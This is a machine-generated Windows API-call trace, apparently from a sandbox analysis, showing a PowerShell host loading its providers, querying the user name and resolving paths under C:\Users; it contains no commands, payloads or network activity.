	[0213.870] CoTaskMemAlloc (cb=0x204) returned 0x2989c0
	[0213.870] GetUserNameW (in: lpBuffer=0x2989c0, pcbBuffer=0x1bd778 | out: lpBuffer="aETAdzjz", pcbBuffer=0x1bd778) returned 1
	[0213.871] CoTaskMemFree (pv=0x2989c0) 
	[0213.871] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e83fc8*="FileSystem", lpRawData=0x2e83d58) returned 1
	[0213.884] CoTaskMemAlloc (cb=0x104) returned 0x2b5590
	[0213.884] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b5590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0213.884] CoTaskMemFree (pv=0x2b5590) 
	[0213.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0213.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bcf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0213.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bcf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0213.886] CoTaskMemAlloc (cb=0x804) returned 0x1b7c6ed0
	[0213.886] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7c6ed0, nSize=0x1bd738 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x1bd738) returned 0x1
	[0213.886] CoTaskMemFree (pv=0x1b7c6ed0) 
	[0213.886] CoTaskMemAlloc (cb=0x204) returned 0x2989c0
	[0213.886] GetUserNameW (in: lpBuffer=0x2989c0, pcbBuffer=0x1bd778 | out: lpBuffer="aETAdzjz", pcbBuffer=0x1bd778) returned 1
	[0213.887] CoTaskMemFree (pv=0x2989c0) 
	[0213.887] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e897b8*="Function", lpRawData=0x2e89548) returned 1
	[0214.004] CoTaskMemAlloc (cb=0x104) returned 0x2b5590
	[0214.004] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b5590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0214.004] CoTaskMemFree (pv=0x2b5590) 
	[0219.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bcfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bcf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bcf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.275] CoTaskMemAlloc (cb=0x804) returned 0x1b7c6ed0
	[0219.275] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7c6ed0, nSize=0x1bd738 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x1bd738) returned 0x1
	[0219.276] CoTaskMemFree (pv=0x1b7c6ed0) 
	[0219.276] CoTaskMemAlloc (cb=0x204) returned 0x2989c0
	[0219.276] GetUserNameW (in: lpBuffer=0x2989c0, pcbBuffer=0x1bd778 | out: lpBuffer="aETAdzjz", pcbBuffer=0x1bd778) returned 1
	[0219.276] CoTaskMemFree (pv=0x2989c0) 
	[0219.276] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ebbb40*="Registry", lpRawData=0x2ebb8d0) returned 1
	[0219.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bcfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bcf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bcf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.570] CoTaskMemAlloc (cb=0x804) returned 0x1b7c6ed0
	[0219.570] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7c6ed0, nSize=0x1bd738 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x1bd738) returned 0x1
	[0219.570] CoTaskMemFree (pv=0x1b7c6ed0) 
	[0219.570] CoTaskMemAlloc (cb=0x204) returned 0x2989c0
	[0219.570] GetUserNameW (in: lpBuffer=0x2989c0, pcbBuffer=0x1bd778 | out: lpBuffer="aETAdzjz", pcbBuffer=0x1bd778) returned 1
	[0219.571] CoTaskMemFree (pv=0x2989c0) 
	[0219.571] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ec0f08*="Variable", lpRawData=0x2ec0c98) returned 1
	[0219.698] CoTaskMemAlloc (cb=0x104) returned 0x2b5590
	[0219.698] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b5590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0219.698] CoTaskMemFree (pv=0x2b5590) 
	[0219.700] CoTaskMemAlloc (cb=0x104) returned 0x2b5590
	[0219.700] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b5590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0219.701] CoTaskMemFree (pv=0x2b5590) 
	[0219.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1bcfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0219.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1bcf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0219.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1bcf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0219.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1bcf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0221.831] CoTaskMemAlloc (cb=0x804) returned 0x1b7c6ed0
	[0221.831] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7c6ed0, nSize=0x1bd738 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x1bd738) returned 0x1
	[0221.832] CoTaskMemFree (pv=0x1b7c6ed0) 
	[0221.832] CoTaskMemAlloc (cb=0x204) returned 0x2989c0
	[0221.832] GetUserNameW (in: lpBuffer=0x2989c0, pcbBuffer=0x1bd778 | out: lpBuffer="aETAdzjz", pcbBuffer=0x1bd778) returned 1
	[0221.832] CoTaskMemFree (pv=0x2989c0) 
	[0221.832] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ed4ad0*="Certificate", lpRawData=0x2ed4860) returned 1
	[0222.510] CoTaskMemAlloc (cb=0x104) returned 0x2b5590
	[0222.510] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b5590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0222.510] CoTaskMemFree (pv=0x2b5590) 
	[0222.513] GetLogicalDrives () returned 0x4
	[0222.513] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1bd3c0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0222.514] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0222.515] CoTaskMemAlloc (cb=0x20e) returned 0x1b7a4dd0
	[0222.515] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b7a4dd0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0222.515] CoTaskMemFree (pv=0x1b7a4dd0) 
	[0222.516] CoTaskMemAlloc (cb=0x104) returned 0x2b5590
	[0222.516] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b5590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0222.516] CoTaskMemFree (pv=0x2b5590) 
	[0222.516] CoTaskMemAlloc (cb=0x104) returned 0x2b5590
	[0222.516] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b5590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0222.516] CoTaskMemFree (pv=0x2b5590) 
	[0222.535] CoTaskMemAlloc (cb=0x104) returned 0x2b5590
	[0222.535] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b5590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0222.542] CoTaskMemAlloc (cb=0x104) returned 0x2b5590
	[0222.542] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b5590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0222.545] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x1bd120, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0222.545] SetErrorMode (uMode=0x1) returned 0x1
	[0222.545] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x1bd380 | out: lpFileInformation=0x1bd380*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0222.546] SetErrorMode (uMode=0x1) returned 0x1
	[0222.546] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x1bd120, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0222.546] SetErrorMode (uMode=0x1) returned 0x1
	[0222.546] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x1bd380 | out: lpFileInformation=0x1bd380*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0222.546] SetErrorMode (uMode=0x1) returned 0x1
	[0222.547] CoTaskMemAlloc (cb=0x104) returned 0x2b5590
	[0222.547] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b5590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0223.271] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x1bd2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0223.274] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1bd130, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0223.274] SetErrorMode (uMode=0x1) returned 0x1
	[0223.274] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1bd340 | out: lpFileInformation=0x1bd340*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0223.274] SetErrorMode (uMode=0x1) returned 0x1
	[0223.274] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1bd130, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0223.274] SetErrorMode (uMode=0x1) returned 0x1
	[0223.274] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1bd340 | out: lpFileInformation=0x1bd340*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0223.274] SetErrorMode (uMode=0x1) returned 0x1
	[0223.274] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1bd140, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0223.274] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1bd030, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0223.274] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x1bd130, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0223.275] SetErrorMode (uMode=0x1) returned 0x1
	[0223.275] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x1bd340 | out: lpFileInformation=0x1bd340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0223.275] SetErrorMode (uMode=0x1) returned 0x1
	[0223.275] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x1bd130, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0223.275] SetErrorMode (uMode=0x1) returned 0x1
	[0223.275] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x1bd340 | out: lpFileInformation=0x1bd340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0223.275] SetErrorMode (uMode=0x1) returned 0x1
	[0223.275] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x1bd140, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0223.275] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x1bd030, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0223.275] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x1bd130, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0223.275] SetErrorMode (uMode=0x1) returned 0x1
	[0223.275] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x1bd340 | out: lpFileInformation=0x1bd340*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0223.275] SetErrorMode (uMode=0x1) returned 0x1
	[0223.276] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x1bd130, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0223.276] SetErrorMode (uMode=0x1) returned 0x1
	[0223.276] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x1bd340 | out: lpFileInformation=0x1bd340*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0223.276] SetErrorMode (uMode=0x1) returned 0x1
	[0223.276] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x1bd140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0223.276] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\.", nBufferLength=0x105, lpBuffer=0x1bd030, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0223.276] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x1bd130, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0223.276] SetErrorMode (uMode=0x1) returned 0x1
	[0223.276] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x1bd340 | out: lpFileInformation=0x1bd340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0223.276] SetErrorMode (uMode=0x1) returned 0x1
	[0223.276] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x1bd130, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0223.276] SetErrorMode (uMode=0x1) returned 0x1
	[0223.277] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x1bd340 | out: lpFileInformation=0x1bd340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0223.277] SetErrorMode (uMode=0x1) returned 0x1
	[0223.277] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x1bd140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0223.277] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\.", nBufferLength=0x105, lpBuffer=0x1bd030, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0223.277] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x1bd170, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0223.277] SetErrorMode (uMode=0x1) returned 0x1
	[0223.277] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x1bd380 | out: lpFileInformation=0x1bd380*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0223.277] SetErrorMode (uMode=0x1) returned 0x1
	[0223.277] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x1bd170, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0223.277] SetErrorMode (uMode=0x1) returned 0x1
	[0223.277] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x1bd380 | out: lpFileInformation=0x1bd380*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0223.278] SetErrorMode (uMode=0x1) returned 0x1
	[0223.278] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x1bd180, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0223.278] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x1bd070, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0223.278] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x1bd170, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0223.278] SetErrorMode (uMode=0x1) returned 0x1
	[0223.278] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x1bd380 | out: lpFileInformation=0x1bd380*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0223.278] SetErrorMode (uMode=0x1) returned 0x1
	[0223.278] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x1bd170, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0223.278] SetErrorMode (uMode=0x1) returned 0x1
	[0223.278] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x1bd380 | out: lpFileInformation=0x1bd380*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0223.278] SetErrorMode (uMode=0x1) returned 0x1
	[0223.278] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x1bd180, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
